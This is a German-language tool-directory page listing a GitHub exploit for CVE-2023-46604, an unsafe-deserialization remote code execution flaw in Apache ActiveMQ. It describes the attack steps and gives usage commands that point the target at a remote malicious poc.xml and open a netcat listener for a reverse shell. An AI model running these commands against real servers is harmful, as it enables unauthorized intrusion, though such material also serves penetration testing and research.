Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-46604 — Das Skript nutzt eine Sicherheitslücke durch unsichere Deserialisierung in Apache ActiveMQ aus (CVE-2023-46604). | Kitploit
Tools/GitHubGitHub/pulentoski/cve-2023-46604
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlRemote-Access-ToolPayload-Entwicklung
GitHubpulentoski/cve-2023-46604

CVE-2023-46604

Das Skript nutzt eine Sicherheitslücke durch unsichere Deserialisierung in Apache ActiveMQ aus (CVE-2023-46604).

Repository anzeigen
114vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Resumen Técnico del Ataque: CVE-2023-46604

Das Skript nutzt eine Sicherheitslücke bei unsicherer Deserialisierung in Apache ActiveMQ (CVE-2023-46604) aus, um eine Remotecodeausführung auf dem Zielserver zu erreichen. Beschreibung des Ausnutzungsprozesses

root@kitploit:~
Ziel der Schwachstelle:
    Die Schwachstelle liegt im OpenWire-Protokoll von Apache ActiveMQ.
    Sie ermöglicht die unsichere Deserialisierung von Objekten, was dazu genutzt werden kann, beliebigen Code auf dem Server auszuführen.

Voraussetzungen:
    Netzwerkzugriff auf den ActiveMQ-Server.
    Eine schädliche XML-Datei (poc.xml), die über eine vom Zielserver erreichbare URL verfügbar ist.

Komponenten des Angriffs:
    Python-Skript: Automatisiert das Senden der schädlichen Nutzlast an den ActiveMQ-Server.
    XML-Datei (poc.xml): Enthält einen Spring-Bean, der die Ausführung eines schädlichen Befehls definiert (z. B. Öffnen einer Reverse Shell).

Schritte des Angriffs

root@kitploit:~
Vorbereitung der Nutzlast:
    Das Skript erstellt eine hexadezimale Nachricht, die Folgendes enthält:
        Den Namen der Java-Klasse: org.springframework.context.support.ClassPathXmlApplicationContext.
        Die URL der schädlichen XML-Datei.
    Die Nutzlast wird in eine Byte-Sequenz umgewandelt, die über das OpenWire-Protokoll gesendet werden kann.

Senden der Nutzlast:
    Das Skript öffnet eine TCP-Socketverbindung zum ActiveMQ-Server auf dem angegebenen Port (standardmäßig 61616).
    Es sendet die schädliche Nutzlast an den Server.

Ausführung des schädlichen Codes:
    Der ActiveMQ-Server deserialisiert das in der Nutzlast angegebene Objekt.
    Aufgrund der unsicheren Deserialisierung wird der in der XML-Datei definierte Spring-Bean geladen und ausgeführt.
    Dieser Bean führt einen schädlichen Befehl (z. B. eine Reverse Shell) auf dem Server aus.

    _________________________________________________________

Ausführungsbeispiel:

  • python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml

  • nc -lvnp 9001

Dieses Skript wurde kopiert und ins Spanische übersetzt/modifiziert: https://github.com/evkl1d/CVE-2023-46604.git

Tool herunterladen